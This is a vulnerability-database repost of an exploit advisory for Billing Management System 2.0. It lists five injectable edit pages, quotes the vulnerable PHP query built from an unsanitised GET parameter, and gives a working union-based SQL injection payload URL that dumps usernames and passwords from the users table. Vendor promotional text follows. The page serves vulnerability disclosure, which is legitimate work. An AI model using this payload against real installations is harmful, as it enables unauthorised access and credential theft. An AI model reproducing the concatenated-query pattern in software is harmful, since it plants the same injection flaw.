Lucene search
K

Billing Management System 2.0 SQL Injection

🗓️ 17 May 2021 00:00:00Reported by Mohammad KoochakiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 113 Views

Billing Management System 2.0 SQL Injection vulnerability in edit path

Code
`# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)  
# Date: 2021-05-16  
# Exploit Author: Mohammad Koochaki  
# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code  
# Version: 2.0  
  
# This web application contains several SQL injection vulnerabilities in the following paths:  
- http://localhost/editgroup.php?id=1  
- http://localhost/edituser.php?id=1  
- http://localhost/editcategory.php?id=10  
- http://localhost/editproduct.php?id=1  
- http://localhost/editsales.php?id=1  
  
# PoC (editgroup.php):  
  
- Vulnerable code:  
$sql="SELECT * from user_groups where delete_status='0' and  
id='".$_GET['id']." '";  
  
- Payload:  
  
http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation